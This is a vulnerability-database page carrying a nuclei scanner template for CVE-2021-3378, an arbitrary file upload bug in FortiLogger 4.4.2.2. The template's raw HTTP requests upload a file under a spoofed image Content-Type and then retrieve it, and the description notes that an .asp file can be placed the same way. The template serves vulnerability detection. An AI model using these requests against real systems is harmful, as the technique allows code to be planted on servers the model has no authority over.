Lucene search
K

FortiLogger 4.4.2.2 - Arbitrary File Upload

🗓️ 16 Jun 2026 07:13:51Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 110 Views

FortiLogger 4.4.2.2 - Arbitrary File Upload affects FortiLogger 4.4.2.2 with potential unauthorized access, remote code execution, and system compromise. Apply security patch or upgrade to mitigate

Related
Refs
Code
id: CVE-2021-3378

info:
  name: FortiLogger 4.4.2.2 - Arbitrary File Upload
  author: dwisiswant0
  severity: critical
  description: |
    FortiLogger 4.4.2.2 is affected by arbitrary file upload issues. Attackers can send a "Content-Type: image/png" header to Config/SaveUploadedHotspotLogoFile and then Assets/temp/hotspot/img/logohotspot.asp.
  impact: |
    Successful exploitation of this vulnerability could result in unauthorized access, remote code execution, and potential compromise of the affected system.
  remediation: |
    Apply the latest security patch or upgrade to a patched version of FortiLogger to mitigate this vulnerability.
  reference:
    - https://erberkan.github.io/2021/cve-2021-3378/
    - https://github.com/erberkan/fortilogger_arbitrary_fileupload
    - http://packetstormsecurity.com/files/161601/FortiLogger-4.4.2.2-Arbitrary-File-Upload.html
    - http://packetstormsecurity.com/files/161974/FortiLogger-Arbitrary-File-Upload.html
    - https://github.com/SYRTI/POC_to_review
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2021-3378
    cwe-id: CWE-434
    epss-score: 0.97512
    epss-percentile: 0.99893
    cpe: cpe:2.3:a:fortilogger:fortilogger:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: fortilogger
    product: fortilogger
  tags: cve,cve2021,fortilogger,fortigate,fortinet,packetstorm,fileupload,intrusive,vuln

http:
  - raw:
      - |
        POST /Config/SaveUploadedHotspotLogoFile HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundarySHHbUsfCoxlX1bpS
        Accept: application/json
        Referer: {{BaseURL}}
        Connection: close
        X-Requested-With: XMLHttpRequest

        ------WebKitFormBoundarySHHbUsfCoxlX1bpS
        Content-Disposition: form-data; name="file"; filename="poc.txt"
        Content-Type: image/png

        {{randstr}}

        ------WebKitFormBoundarySHHbUsfCoxlX1bpS
      - |
        GET /Assets/temp/hotspot/img/logohotspot.txt HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body_2
        words:
          - "{{randstr}}"

      - type: word
        part: header
        words:
          - "text/plain"
          - "ASP.NET"
        condition: and

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100c0a1541d0f8d36d455005f0b4ec120b4309207ce27b32b19e4c1c2ed9dba063f022100d13905db69030d25746f9470875eaca5ecce21b1116582c0944020a8a4d90582:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation